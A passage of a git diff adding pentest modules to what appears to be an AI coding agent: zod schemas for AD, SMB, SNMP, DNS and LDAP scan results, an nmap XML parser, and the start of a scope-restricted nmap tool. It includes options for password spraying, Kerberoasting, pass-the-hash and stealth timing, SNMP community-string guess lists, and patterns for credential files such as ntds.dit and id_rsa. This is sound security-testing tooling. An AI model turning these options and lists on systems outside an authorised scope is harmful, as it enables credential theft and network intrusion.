+  export const ADFunctionalLevel = z.enum([
+    "2000",
+    "2003",
+    "2008",
+    "2008R2",
+    "2012",
+    "2012R2",
+    "2016",
+    "2019",
+    "2022",
+    "unknown",
+  ])
+  export type ADFunctionalLevel = z.infer<typeof ADFunctionalLevel>
+
+  /**
+   * Trust direction.
+   */
+  export const TrustDirection = z.enum(["inbound", "outbound", "bidirectional", "unknown"])
+  export type TrustDirection = z.infer<typeof TrustDirection>
+
+  /**
+   * Trust type.
+   */
+  export const TrustType = z.enum(["parent-child", "tree-root", "shortcut", "external", "forest", "unknown"])
+  export type TrustType = z.infer<typeof TrustType>
+
+  /**
+   * Credential testing method.
+   */
+  export const CredentialMethod = z.enum(["default", "spray", "brute", "manual"])
+  export type CredentialMethod = z.infer<typeof CredentialMethod>
+
+  // ============================================
+  // Network Host Types
+  // ============================================
+
+  /**
+   * Network service information.
+   */
+  export const NetworkService = z.object({
+    port: z.number().int().min(1).max(65535),
+    protocol: Protocol,
+    service: ServiceType,
+    version: z.string().optional(),
+    banner: z.string().optional(),
+    product: z.string().optional(),
+    extraInfo: z.string().optional(),
+    authenticated: z.boolean().default(false),
+    vulnerabilities: z.array(z.string()).default([]),
+  })
+  export type NetworkService = z.infer<typeof NetworkService>
+
+  /**
+   * AD host information.
+   */
+  export const ADHostInfo = z.object({
+    computerName: z.string(),
+    dnsDomain: z.string().optional(),
+    domainController: z.boolean().default(false),
+    operatingSystem: z.string().optional(),
+    operatingSystemVersion: z.string().optional(),
+    servicePack: z.string().optional(),
+    lastLogon: z.number().optional(),
+  })
+  export type ADHostInfo = z.infer<typeof ADHostInfo>
+
+  /**
+   * Network host.
+   */
+  export const NetworkHost = z.object({
+    ip: z.string(),
+    hostname: z.string().optional(),
+    domain: z.string().optional(),
+    os: z.string().optional(),
+    osVersion: z.string().optional(),
+    macAddress: z.string().optional(),
+    services: z.array(NetworkService).default([]),
+    adInfo: ADHostInfo.optional(),
+    discoveredAt: z.number(),
+  })
+  export type NetworkHost = z.infer<typeof NetworkHost>
+
+  // ============================================
+  // SMB Types
+  // ============================================
+
+  /**
+   * SMB share permissions.
+   */
+  export const SharePermissions = z.object({
+    read: z.boolean().default(false),
+    write: z.boolean().default(false),
+    delete: z.boolean().optional(),
+    anonymous: z.boolean().default(false),
+  })
+  export type SharePermissions = z.infer<typeof SharePermissions>
+
+  /**
+   * SMB share.
+   */
+  export const SMBShare = z.object({
+    name: z.string(),
+    path: z.string().optional(),
+    type: ShareType,
+    remark: z.string().optional(),
+    permissions: SharePermissions,
+    files: z.array(z.string()).optional(),
+    sensitiveFiles: z.array(z.string()).default([]),
+  })
+  export type SMBShare = z.infer<typeof SMBShare>
+
+  /**
+   * SMB signing configuration.
+   */
+  export const SMBSigning = z.object({
+    enabled: z.boolean(),
+    required: z.boolean(),
+  })
+  export type SMBSigning = z.infer<typeof SMBSigning>
+
+  /**
+   * SMB vulnerability check result.
+   */
+  export const SMBVulnCheck = z.object({
+    name: z.string(), // e.g., "MS17-010", "SMBGhost"
+    vulnerable: z.boolean(),
+    details: z.string().optional(),
+    cve: z.string().optional(),
+  })
+  export type SMBVulnCheck = z.infer<typeof SMBVulnCheck>
+
+  /**
+   * SMB scan result.
+   */
+  export const SMBResult = z.object({
+    host: z.string(),
+    port: z.number().default(445),
+    smbVersion: z.string().optional(),
+    signing: SMBSigning.optional(),
+    nullSession: z.boolean().optional(),
+    guestAccess: z.boolean().optional(),
+    shares: z.array(SMBShare).default([]),
+    vulnChecks: z.array(SMBVulnCheck).default([]),
+    users: z.array(z.string()).optional(),
+    groups: z.array(z.string()).optional(),
+    domain: z.string().optional(),
+  })
+  export type SMBResult = z.infer<typeof SMBResult>
+
+  // ============================================
+  // SNMP Types
+  // ============================================
+
+  /**
+   * SNMP interface information.
+   */
+  export const SNMPInterface = z.object({
+    index: z.number(),
+    name: z.string(),
+    type: z.string().optional(),
+    mtu: z.number().optional(),
+    speed: z.number().optional(),
+    physAddress: z.string().optional(),
+    adminStatus: z.string().optional(),
+    operStatus: z.string().optional(),
+    ipAddress: z.string().optional(),
+  })
+  export type SNMPInterface = z.infer<typeof SNMPInterface>
+
+  /**
+   * ARP table entry.
+   */
+  export const ARPEntry = z.object({
+    ipAddress: z.string(),
+    macAddress: z.string(),
+    interface: z.string().optional(),
+    type: z.string().optional(),
+  })
+  export type ARPEntry = z.infer<typeof ARPEntry>
+
+  /**
+   * Routing table entry.
+   */
+  export const RouteEntry = z.object({
+    destination: z.string(),
+    mask: z.string().optional(),
+    nextHop: z.string(),
+    metric: z.number().optional(),
+    interface: z.string().optional(),
+    protocol: z.string().optional(),
+  })
+  export type RouteEntry = z.infer<typeof RouteEntry>
+
+  /**
+   * SNMP scan result.
+   */
+  export const SNMPResult = z.object({
+    host: z.string(),
+    port: z.number().default(161),
+    community: z.string(),
+    version: SNMPVersion,
+    sysDescr: z.string().optional(),
+    sysName: z.string().optional(),
+    sysContact: z.string().optional(),
+    sysLocation: z.string().optional(),
+    sysObjectID: z.string().optional(),
+    uptime: z.number().optional(),
+    interfaces: z.array(SNMPInterface).default([]),
+    arpTable: z.array(ARPEntry).optional(),
+    routingTable: z.array(RouteEntry).optional(),
+    processes: z.array(z.string()).optional(),
+    software: z.array(z.string()).optional(),
+    writeAccess: z.boolean().default(false),
+  })
+  export type SNMPResult = z.infer<typeof SNMPResult>
+
+  // ============================================
+  // DNS Types
+  // ============================================
+
+  /**
+   * DNS record.
+   */
+  export const DNSRecord = z.object({
+    name: z.string(),
+    type: DNSRecordType,
+    value: z.string(),
+    ttl: z.number().optional(),
+    priority: z.number().optional(), // For MX records
+  })
+  export type DNSRecord = z.infer<typeof DNSRecord>
+
+  /**
+   * DNS zone.
+   */
+  export const DNSZone = z.object({
+    domain: z.string(),
+    nameservers: z.array(z.string()).default([]),
+    transferAllowed: z.boolean().default(false),
+    records: z.array(DNSRecord).default([]),
+    subdomains: z.array(z.string()).default([]),
+    soaRecord: z
+      .object({
+        primaryNs: z.string(),
+        adminEmail: z.string(),
+        serial: z.number(),
+        refresh: z.number(),
+        retry: z.number(),
+        expire: z.number(),
+        minTtl: z.number(),
+      })
+      .optional(),
+  })
+  export type DNSZone = z.infer<typeof DNSZone>
+
+  // ============================================
+  // LDAP Types
+  // ============================================
+
+  /**
+   * LDAP bind result.
+   */
+  export const LDAPBindResult = z.object({
+    host: z.string(),
+    port: z.number().default(389),
+    ssl: z.boolean().default(false),
+    anonymousBind: z.boolean().default(false),
+    authenticatedBind: z.boolean().default(false),
+    baseDN: z.string().optional(),
+    namingContexts: z.array(z.string()).default([]),
+    supportedControls: z.array(z.string()).optional(),
+    supportedSASLMechanisms: z.array(z.string()).optional(),
+  })
+  export type LDAPBindResult = z.infer<typeof LDAPBindResult>
+
+  /**
+   * Password policy.
+   */
+  export const PasswordPolicy = z.object({
+    minLength: z.number().optional(),
+    historyLength: z.number().optional(),
+    maxAge: z.number().optional(), // In days
+    minAge: z.number().optional(), // In days
+    complexity: z.boolean().optional(), // Alias for complexityEnabled
+    complexityEnabled: z.boolean().optional(),
+    lockoutThreshold: z.number().optional(),
+    lockoutDuration: z.number().optional(), // In minutes
+    lockoutObservationWindow: z.number().optional(), // In minutes
+    reversibleEncryption: z.boolean().optional(),
+  })
+  export type PasswordPolicy = z.infer<typeof PasswordPolicy>
+
+  // ============================================
+  // Active Directory Types
+  // ============================================
+
+  /**
+   * Domain trust.
+   */
+  export const DomainTrust = z.object({
+    targetDomain: z.string(),
+    direction: TrustDirection,
+    type: TrustType,
+    trustType: TrustType.optional(), // Alias for type
+    trustDirection: TrustDirection.optional(), // Alias for direction
+    transitive: z.boolean().default(false),
+    isTransitive: z.boolean().optional(), // Alias for transitive
+    sidFiltering: z.boolean().optional(),
+    tgtDelegation: z.boolean().optional(),
+  })
+  export type DomainTrust = z.infer<typeof DomainTrust>
+
+  /**
+   * AD domain information.
+   */
+  export const ADDomain = z.object({
+    name: z.string(), // FQDN: corp.local
+    netbios: z.string(), // NetBIOS: CORP
+    domainSID: z.string().optional(),
+    forestName: z.string().optional(),
+    functionalLevel: ADFunctionalLevel,
+    domainControllers: z.array(z.string()).default([]),
+    trusts: z.array(DomainTrust).default([]),
+    passwordPolicy: PasswordPolicy.optional(),
+    sites: z.array(z.string()).optional(),
+    ouStructure: z.array(z.string()).optional(),
+  })
+  export type ADDomain = z.infer<typeof ADDomain>
+
+  /**
+   * AD user.
+   */
+  export const ADUser = z.object({
+    samAccountName: z.string(),
+    distinguishedName: z.string(),
+    userPrincipalName: z.string().optional(),
+    displayName: z.string().optional(),
+    description: z.string().optional(),
+    memberOf: z.array(z.string()).default([]),
+    enabled: z.boolean().default(true),
+    passwordLastSet: z.number().optional(),
+    lastLogon: z.number().optional(),
+    accountExpires: z.number().optional(),
+    adminCount: z.boolean().default(false),
+    servicePrincipalNames: z.array(z.string()).default([]), // Kerberoasting
+    dontRequirePreauth: z.boolean().default(false), // AS-REP roasting
+    passwordNeverExpires: z.boolean().default(false),
+    passwordNotRequired: z.boolean().default(false),
+    delegationEnabled: z.boolean().default(false),
+    trustedForDelegation: z.boolean().default(false),
+    sid: z.string().optional(),
+  })
+  export type ADUser = z.infer<typeof ADUser>
+
+  /**
+   * AD group.
+   */
+  export const ADGroup = z.object({
+    samAccountName: z.string(),
+    distinguishedName: z.string(),
+    description: z.string().optional(),
+    groupType: z.string().optional(),
+    members: z.array(z.string()).default([]),
+    memberOf: z.array(z.string()).default([]),
+    adminCount: z.boolean().default(false),
+    isPrivileged: z.boolean().default(false),
+    sid: z.string().optional(),
+  })
+  export type ADGroup = z.infer<typeof ADGroup>
+
+  /**
+   * AD computer.
+   */
+  export const ADComputer = z.object({
+    samAccountName: z.string(),
+    distinguishedName: z.string(),
+    dnsHostName: z.string().optional(),
+    dnsHostname: z.string().optional(), // Alias
+    operatingSystem: z.string().optional(),
+    operatingSystemVersion: z.string().optional(),
+    servicePack: z.string().optional(),
+    lastLogon: z.number().optional(),
+    enabled: z.boolean().default(true),
+    isDomainController: z.boolean().default(false),
+    trustedForDelegation: z.boolean().default(false),
+    allowedToDelegateTo: z.array(z.string()).default([]),
+    sid: z.string().optional(),
+  })
+  export type ADComputer = z.infer<typeof ADComputer>
+
+  /**
+   * GPO information.
+   */
+  export const GPO = z.object({
+    name: z.string(),
+    displayName: z.string(),
+    distinguishedName: z.string(),
+    gpoStatus: z.string().optional(),
+    createdAt: z.number().optional(),
+    modifiedAt: z.number().optional(),
+    linkedTo: z.array(z.string()).default([]),
+  })
+  export type GPO = z.infer<typeof GPO>
+
+  /**
+   * Kerberoastable account.
+   */
+  export const KerberoastableAccount = z.object({
+    samAccountName: z.string(),
+    servicePrincipalName: z.string(),
+    enabled: z.boolean(),
+    adminCount: z.boolean(),
+    passwordLastSet: z.number().optional(),
+    lastLogon: z.number().optional(),
+  })
+  export type KerberoastableAccount = z.infer<typeof KerberoastableAccount>
+
+  /**
+   * AS-REP roastable account.
+   */
+  export const ASREPRoastableAccount = z.object({
+    samAccountName: z.string(),
+    userPrincipalName: z.string().optional(),
+    enabled: z.boolean(),
+    passwordLastSet: z.number().optional(),
+  })
+  export type ASREPRoastableAccount = z.infer<typeof ASREPRoastableAccount>
+
+  // ============================================
+  // Credential Types
+  // ============================================
+
+  /**
+   * Credential.
+   */
+  export const Credential = z.object({
+    username: z.string(),
+    password: z.string().optional(),
+    domain: z.string().optional(),
+    hash: z.string().optional(), // NTLM hash
+  })
+  export type Credential = z.infer<typeof Credential>
+
+  /**
+   * Credential test result.
+   */
+  export const CredentialResult = z.object({
+    id: z.string().optional(),
+    host: z.string(),
+    service: ServiceType,
+    port: z.number(),
+    username: z.string(),
+    password: z.string().optional(),
+    domain: z.string().optional(),
+    method: CredentialMethod,
+    valid: z.boolean(),
+    admin: z.boolean().default(false),
+    error: z.string().optional(),
+    timestamp: z.number(),
+  })
+  export type CredentialResult = z.infer<typeof CredentialResult>
+
+  /**
+   * Default credential entry.
+   */
+  export const DefaultCredential = z.object({
+    service: ServiceType,
+    username: z.string(),
+    password: z.string(),
+    description: z.string().optional(),
+  })
+  export type DefaultCredential = z.infer<typeof DefaultCredential>
+
+  // ============================================
+  // Authentication Config
+  // ============================================
+
+  /**
+   * Network authentication configuration.
+   */
+  export const AuthConfig = z.object({
+    username: z.string(),
+    password: z.string().optional(),
+    domain: z.string().optional(),
+    hash: z.string().optional(), // NTLM hash for pass-the-hash
+    kerberos: z
+      .object({
+        ccache: z.string().optional(), // Path to ccache file
+        keytab: z.string().optional(), // Path to keytab file
+      })
+      .optional(),
+  })
+  export type AuthConfig = z.infer<typeof AuthConfig>
+
+  // ============================================
+  // Scan Profile Types
+  // ============================================
+
+  /**
+   * AD scan options.
+   */
+  export const ADScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    enumeration: z.boolean().default(true), // Basic domain enumeration
+    users: z.boolean().default(true),
+    groups: z.boolean().default(true),
+    computers: z.boolean().default(true),
+    gpo: z.boolean().default(false),
+    trusts: z.boolean().default(true),
+    kerberoast: z.boolean().default(false),
+    asrepRoast: z.boolean().default(false),
+  })
+  export type ADScanOptions = z.infer<typeof ADScanOptions>
+
+  /**
+   * SMB scan options.
+   */
+  export const SMBScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    shares: z.boolean().default(true),
+    nullSession: z.boolean().default(true),
+    signing: z.boolean().default(true),
+    vulns: z.boolean().default(false),
+  })
+  export type SMBScanOptions = z.infer<typeof SMBScanOptions>
+
+  /**
+   * SNMP scan options.
+   */
+  export const SNMPScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    walk: z.boolean().default(false),
+    communityBrute: z.boolean().default(false),
+    writeTest: z.boolean().default(false),
+  })
+  export type SNMPScanOptions = z.infer<typeof SNMPScanOptions>
+
+  /**
+   * DNS scan options.
+   */
+  export const DNSScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    zoneTransfer: z.boolean().default(true),
+    enumeration: z.boolean().default(false),
+    cachePoison: z.boolean().default(false),
+  })
+  export type DNSScanOptions = z.infer<typeof DNSScanOptions>
+
+  /**
+   * LDAP scan options.
+   */
+  export const LDAPScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    anonBind: z.boolean().default(true),
+    enumeration: z.boolean().default(false),
+    passwordPolicy: z.boolean().default(false),
+  })
+  export type LDAPScanOptions = z.infer<typeof LDAPScanOptions>
+
+  /**
+   * Credential scan options.
+   */
+  export const CredScanOptions = z.object({
+    enabled: z.boolean().default(false),
+    defaults: z.boolean().default(false),
+    spray: z.boolean().default(false),
+    brute: z.boolean().default(false),
+    lockoutThreshold: z.number().optional(),
+    lockoutWindow: z.number().optional(), // minutes
+  })
+  export type CredScanOptions = z.infer<typeof CredScanOptions>
+
+  /**
+   * Scan profile.
+   */
+  export const ScanProfile = z.object({
+    id: ProfileId,
+    name: z.string(),
+    description: z.string(),
+    modules: z.object({
+      ad: ADScanOptions,
+      smb: SMBScanOptions,
+      snmp: SNMPScanOptions,
+      dns: DNSScanOptions,
+      ldap: LDAPScanOptions,
+      creds: CredScanOptions,
+    }),
+    timeout: z.number().default(60000),
+    rateLimit: z.number().optional(), // requests per second
+    maxThreads: z.number().optional(), // max concurrent operations
+    randomizeOrder: z.boolean().optional(), // randomize module order (for stealth)
+    jitterMs: z.number().optional(), // random delay between operations
+  })
+  export type ScanProfile = z.infer<typeof ScanProfile>
+
+  // ============================================
+  // Scan Result Types
+  // ============================================
+
+  /**
+   * Network scan statistics.
+   */
+  export const NetScanStats = z.object({
+    hostsDiscovered: z.number().default(0),
+    hostsScanned: z.number().default(0),
+    servicesFound: z.number().default(0),
+    servicesDiscovered: z.number().default(0),
+    sharesFound: z.number().default(0),
+    usersEnumerated: z.number().default(0),
+    groupsEnumerated: z.number().default(0),
+    credentialsTested: z.number().default(0),
+    credentialsFound: z.number().default(0),
+    credentialsValid: z.number().default(0),
+    vulnerabilitiesFound: z.number().default(0),
+    findingsCount: z.number().default(0),
+    criticalCount: z.number().default(0),
+    highCount: z.number().default(0),
+    mediumCount: z.number().default(0),
+    lowCount: z.number().default(0),
+    infoCount: z.number().default(0),
+    duration: z.number().default(0),
+  })
+  export type NetScanStats = z.infer<typeof NetScanStats>
+
+  /**
+   * Network scan result.
+   */
+  export const NetScanResult = z.object({
+    id: z.string(),
+    target: z.string(), // IP range, domain, or host
+    profile: ProfileId,
+    auth: AuthConfig.optional(),
+    hosts: z.array(NetworkHost).default([]),
+    adDomain: ADDomain.optional(),
+    users: z.array(ADUser).optional(),
+    groups: z.array(ADGroup).optional(),
+    computers: z.array(ADComputer).optional(),
+    gpos: z.array(GPO).optional(),
+    shares: z.array(SMBShare).optional(), // Direct share results
+    smbResults: z.array(SMBResult).default([]),
+    snmpResults: z.array(SNMPResult).optional(),
+    dnsZones: z.array(DNSZone).default([]),
+    ldapResults: z.array(LDAPBindResult).default([]),
+    credentials: z.array(CredentialResult).optional(),
+    kerberoastable: z.array(KerberoastableAccount).optional(),
+    asrepRoastable: z.array(ASREPRoastableAccount).optional(),
+    findings: z.array(z.string()).default([]), // Finding IDs
+    stats: NetScanStats,
+    startedAt: z.number(),
+    completedAt: z.number().optional(),
+    status: Status,
+    error: z.string().optional(),
+  })
+  export type NetScanResult = z.infer<typeof NetScanResult>
+
+  // ============================================
+  // Constants
+  // ============================================
+
+  /**
+   * Common SNMP community strings.
+   */
+  export const COMMON_SNMP_COMMUNITIES = [
+    "public",
+    "private",
+    "community",
+    "snmp",
+    "admin",
+    "default",
+    "read",
+    "write",
+    "monitor",
+    "manager",
+    "cisco",
+    "router",
+    "switch",
+    "secret",
+    "password",
+    "test",
+    "guest",
+    "internal",
+    "external",
+    "network",
+  ]
+
+  /**
+   * Common subdomain prefixes for DNS enumeration.
+   */
+  export const COMMON_SUBDOMAINS = [
+    "www",
+    "mail",
+    "ftp",
+    "smtp",
+    "pop",
+    "imap",
+    "webmail",
+    "ns",
+    "ns1",
+    "ns2",
+    "dns",
+    "dns1",
+    "dns2",
+    "vpn",
+    "remote",
+    "gateway",
+    "gw",
+    "proxy",
+    "fw",
+    "firewall",
+    "router",
+    "switch",
+    "dc",
+    "dc1",
+    "dc2",
+    "ad",
+    "ldap",
+    "kdc",
+    "exchange",
+    "owa",
+    "autodiscover",
+    "intranet",
+    "portal",
+    "api",
+    "dev",
+    "staging",
+    "test",
+    "prod",
+    "app",
+    "web",
+    "db",
+    "database",
+    "sql",
+    "mysql",
+    "postgres",
+    "oracle",
+    "backup",
+    "storage",
+    "nas",
+    "san",
+    "file",
+    "files",
+    "share",
+    "print",
+    "scan",
+    "admin",
+    "manage",
+    "monitor",
+    "log",
+    "syslog",
+    "ntp",
+    "time",
+  ]
+
+  /**
+   * Sensitive file patterns for SMB share scanning.
+   */
+  export const SENSITIVE_FILE_PATTERNS = [
+    /password/i,
+    /credential/i,
+    /secret/i,
+    /\.kdbx?$/i, // KeePass
+    /\.pfx$/i, // Certificates
+    /\.p12$/i,
+    /\.pem$/i,
+    /\.key$/i,
+    /id_rsa/i,
+    /id_dsa/i,
+    /id_ecdsa/i,
+    /id_ed25519/i,
+    /\.ssh/i,
+    /web\.config/i,
+    /wp-config\.php/i,
+    /\.env$/,
+    /\.htpasswd/i,
+    /shadow$/,
+    /passwd$/,
+    /sam$/i,
+    /ntds\.dit/i,
+    /unattend\.xml/i,
+    /sysprep\.xml/i,
+    /groups\.xml/i,
+    /scheduledtasks\.xml/i,
+    /services\.xml/i,
+    /printers\.xml/i,
+    /drives\.xml/i,
+    /datasources\.xml/i,
+  ]
+
+  /**
+   * High-value AD groups.
+   */
+  export const HIGH_VALUE_GROUPS = [
+    "Domain Admins",
+    "Enterprise Admins",
+    "Schema Admins",
+    "Administrators",
+    "Account Operators",
+    "Backup Operators",
+    "Server Operators",
+    "Print Operators",
+    "DnsAdmins",
+    "Exchange Organization Administrators",
+    "Organization Management",
+    "DHCP Administrators",
+  ]
+
+  /**
+   * Default ports for services.
+   */
+  export const SERVICE_PORTS: Record<string, number[]> = {
+    smb: [445, 139],
+    ldap: [389, 636],
+    dns: [53],
+    snmp: [161, 162],
+    kerberos: [88],
+    rpc: [135, 593],
+    ssh: [22],
+    ftp: [21],
+    telnet: [23],
+    rdp: [3389],
+    winrm: [5985, 5986],
+    mssql: [1433, 1434],
+    mysql: [3306],
+    postgresql: [5432],
+    oracle: [1521],
+    vnc: [5900, 5901],
+    http: [80, 8080, 8000, 8443],
+    https: [443, 8443],
+  }
+}
diff --git a/packages/opencode/src/pentest/nmap-parser.ts b/packages/opencode/src/pentest/nmap-parser.ts
new file mode 100644
index 00000000000..ad5d1e55ea4
--- /dev/null
+++ b/packages/opencode/src/pentest/nmap-parser.ts
@@ -0,0 +1,248 @@
+/**
+ * @fileoverview Nmap XML Parser
+ *
+ * Parses nmap XML output into structured scan results.
+ * Supports standard nmap XML format from -oX flag.
+ *
+ * @module pentest/nmap-parser
+ */
+
+import { PentestTypes } from "./types"
+import { Log } from "../util/log"
+
+export namespace NmapParser {
+  const log = Log.create({ service: "pentest.nmap-parser" })
+
+  /**
+   * Parse nmap XML output into structured scan result.
+   *
+   * @param xml - Raw nmap XML output
+   * @param scanID - Unique scan identifier
+   * @param sessionID - Session identifier
+   * @returns Parsed scan result
+   *
+   * @example
+   * ```typescript
+   * const xml = await $`nmap -oX - 192.168.1.1`.text()
+   * const result = NmapParser.parse(xml, "scan_123", "session_456")
+   * console.log(result.hosts[0].ports)
+   * ```
+   */
+  export function parse(
+    xml: string,
+    scanID: string,
+    sessionID: string,
+    target: string,
+    command: string
+  ): PentestTypes.ScanResult {
+    const hosts: PentestTypes.Host[] = []
+    let startTime = Date.now()
+    let endTime: number | undefined
+
+    try {
+      // Parse nmaprun element for timing
+      const nmaprunMatch = xml.match(/<nmaprun[^>]*start="(\d+)"[^>]*>/)
+      if (nmaprunMatch) {
+        startTime = parseInt(nmaprunMatch[1], 10) * 1000
+      }
+
+      const runstatsMatch = xml.match(/<finished[^>]*time="(\d+)"[^>]*\/>/)
+      if (runstatsMatch) {
+        endTime = parseInt(runstatsMatch[1], 10) * 1000
+      }
+
+      // Parse each host
+      const hostMatches = xml.matchAll(/<host[^>]*>([\s\S]*?)<\/host>/g)
+      for (const hostMatch of hostMatches) {
+        const hostXml = hostMatch[1]
+        const host = parseHost(hostXml)
+        if (host) {
+          hosts.push(host)
+        }
+      }
+    } catch (err) {
+      log.error("Failed to parse nmap XML", { error: err instanceof Error ? err.message : String(err) })
+    }
+
+    return {
+      id: scanID,
+      sessionID,
+      scanType: "port",
+      target,
+      command,
+      startTime,
+      endTime,
+      hosts,
+      xmlOutput: xml,
+    }
+  }
+
+  /**
+   * Parse a single host element from nmap XML.
+   */
+  function parseHost(hostXml: string): PentestTypes.Host | null {
+    // Parse address
+    const addrMatch = hostXml.match(/<address[^>]*addr="([^"]+)"[^>]*addrtype="([^"]+)"[^>]*\/>/)
+    if (!addrMatch) return null
+
+    const address = addrMatch[1]
+    const addressType = addrMatch[2] as "ipv4" | "ipv6" | "mac"
+
+    // Parse hostname
+    const hostnameMatch = hostXml.match(/<hostname[^>]*name="([^"]+)"[^>]*\/>/)
+    const hostname = hostnameMatch?.[1]
+
+    // Parse status
+    const statusMatch = hostXml.match(/<status[^>]*state="([^"]+)"[^>]*\/>/)
+    const status = (statusMatch?.[1] || "unknown") as "up" | "down" | "unknown"
+
+    // Parse ports
+    const ports: PentestTypes.Port[] = []
+    const portMatches = hostXml.matchAll(/<port[^>]*protocol="([^"]+)"[^>]*portid="(\d+)"[^>]*>([\s\S]*?)<\/port>/g)
+    for (const portMatch of portMatches) {
+      const port = parsePort(portMatch[1], parseInt(portMatch[2], 10), portMatch[3])
+      if (port) {
+        ports.push(port)
+      }
+    }
+
+    // Parse OS detection
+    const osMatches: PentestTypes.OSMatch[] = []
+    const osMatchRegex = hostXml.matchAll(/<osmatch[^>]*name="([^"]+)"[^>]*accuracy="(\d+)"[^>]*>/g)
+    for (const osMatch of osMatchRegex) {
+      osMatches.push({
+        name: osMatch[1],
+        accuracy: parseInt(osMatch[2], 10),
+      })
+    }
+
+    // Parse timing
+    const startTimeMatch = hostXml.match(/<host[^>]*starttime="(\d+)"/)
+    const endTimeMatch = hostXml.match(/<host[^>]*endtime="(\d+)"/)
+
+    return {
+      address,
+      addressType,
+      hostname,
+      status,
+      ports,
+      os: osMatches.length > 0 ? osMatches : undefined,
+      startTime: startTimeMatch ? parseInt(startTimeMatch[1], 10) * 1000 : undefined,
+      endTime: endTimeMatch ? parseInt(endTimeMatch[1], 10) * 1000 : undefined,
+    }
+  }
+
+  /**
+   * Parse a single port element from nmap XML.
+   */
+  function parsePort(protocol: string, portid: number, portXml: string): PentestTypes.Port | null {
+    // Parse state
+    const stateMatch = portXml.match(/<state[^>]*state="([^"]+)"[^>]*reason="([^"]*)"[^>]*\/>/)
+    if (!stateMatch) return null
+
+    const state = stateMatch[1] as PentestTypes.PortState
+    const reason = stateMatch[2] || undefined
+
+    // Parse service
+    let service: PentestTypes.Service | undefined
+    const serviceMatch = portXml.match(/<service([^>]*)\/?>/)
+    if (serviceMatch) {
+      const attrs = serviceMatch[1]
+      service = {
+        name: extractAttr(attrs, "name") || "unknown",
+        product: extractAttr(attrs, "product"),
+        version: extractAttr(attrs, "version"),
+        extrainfo: extractAttr(attrs, "extrainfo"),
+        ostype: extractAttr(attrs, "ostype"),
+        method: extractAttr(attrs, "method"),
+        conf: extractAttr(attrs, "conf") ? parseInt(extractAttr(attrs, "conf")!, 10) : undefined,
+      }
+    }
+
+    return {
+      protocol: protocol as PentestTypes.Protocol,
+      portid,
+      state,
+      reason,
+      service,
+    }
+  }
+
+  /**
+   * Extract an attribute value from an XML attributes string.
+   */
+  function extractAttr(attrs: string, name: string): string | undefined {
+    const match = attrs.match(new RegExp(`${name}="([^"]*)"`, "i"))
+    return match?.[1] || undefined
+  }
+
+  /**
+   * Format scan result as human-readable text.
+   *
+   * @param result - Parsed scan result
+   * @returns Formatted text output
+   */
+  export function formatResult(result: PentestTypes.ScanResult): string {
+    const lines: string[] = []
+
+    lines.push(`Scan Results for ${result.target}`)
+    lines.push("=".repeat(50))
+    lines.push(`Command: ${result.command}`)
+    lines.push(`Started: ${new Date(result.startTime).toISOString()}`)
+    if (result.endTime) {
+      const duration = ((result.endTime - result.startTime) / 1000).toFixed(2)
+      lines.push(`Completed: ${new Date(result.endTime).toISOString()} (${duration}s)`)
+    }
+    lines.push("")
+
+    for (const host of result.hosts) {
+      lines.push(`Host: ${host.address}${host.hostname ? ` (${host.hostname})` : ""}`)
+      lines.push(`Status: ${host.status}`)
+
+      if (host.os && host.os.length > 0) {
+        lines.push(`OS: ${host.os[0].name} (${host.os[0].accuracy}% accuracy)`)
+      }
+
+      if (host.ports.length > 0) {
+        lines.push("")
+        lines.push("PORT      STATE    SERVICE         VERSION")
+        lines.push("-".repeat(60))
+
+        for (const port of host.ports) {
+          const portStr = `${port.portid}/${port.protocol}`.padEnd(10)
+          const stateStr = port.state.padEnd(9)
+          const serviceName = port.service?.name || "unknown"
+          const serviceStr = serviceName.padEnd(16)
+          const versionStr = port.service?.version
+            ? `${port.service.product || ""} ${port.service.version}`.trim()
+            : port.service?.product || ""
+          lines.push(`${portStr}${stateStr}${serviceStr}${versionStr}`)
+        }
+      } else {
+        lines.push("No open ports found.")
+      }
+      lines.push("")
+    }
+
+    if (result.hosts.length === 0) {
+      lines.push("No hosts found or all hosts are down.")
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Summarize scan results for quick overview.
+   */
+  export function summarize(result: PentestTypes.ScanResult): string {
+    const totalHosts = result.hosts.length
+    const upHosts = result.hosts.filter((h) => h.status === "up").length
+    const totalPorts = result.hosts.reduce((sum, h) => sum + h.ports.length, 0)
+    const openPorts = result.hosts.reduce(
+      (sum, h) => sum + h.ports.filter((p) => p.state === "open").length,
+      0
+    )
+
+    return `Scanned ${totalHosts} host(s), ${upHosts} up. Found ${openPorts} open port(s) out of ${totalPorts} scanned.`
+  }
+}
diff --git a/packages/opencode/src/pentest/nmap-tool.ts b/packages/opencode/src/pentest/nmap-tool.ts
new file mode 100644
index 00000000000..79e844b62a3
--- /dev/null
+++ b/packages/opencode/src/pentest/nmap-tool.ts
@@ -0,0 +1,328 @@
+/**
+ * @fileoverview Nmap Tool for Pentest Agent
+ *
+ * Provides a safe interface to nmap for network security scanning.
+ * Integrates with governance for scope enforcement and produces
+ * structured scan results with findings analysis.
+ *
+ * @module pentest/nmap-tool
+ */
+
+import z from "zod"
+import { spawn } from "child_process"
+import { Tool } from "../tool/tool"
+import { Log } from "../util/log"
+import { Instance } from "../project/instance"
+import { NmapParser } from "./nmap-parser"
+import { Findings } from "./findings"
+import { PentestTypes } from "./types"
+import { Bus } from "../bus"
+import { GovernanceMatcher } from "../governance/matcher"
+import { randomBytes } from "crypto"
+
+const log = Log.create({ service: "pentest.nmap-tool" })
+
+const DEFAULT_TIMEOUT = 5 * 60 * 1000 // 5 minutes
+
+function generateScanId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(8).toString("hex")
+  return `scan_${timestamp}_${random}`
+}
+
+/**
+ * Nmap scan tool for network reconnaissance.
+ *
+ * This tool provides a structured interface to nmap, automatically
+ * parsing XML output and creating findings based on discovered services.
+ *
+ * Features:
+ * - Automatic XML output parsing
+ * - Service detection
+ * - Findings generation
+ * - Governance integration (scope enforcement)
+ * - Human-readable and structured output
+ */
+export const NmapTool = Tool.define("nmap", async () => {
+  return {
+    description: `Network security scanner using nmap. Scans targets for open ports, services, and potential vulnerabilities.
+
+IMPORTANT: This tool is subject to governance scope restrictions. Only targets in the allowed scope can be scanned.
+
+Usage examples:
+- Quick scan: target="192.168.1.1"
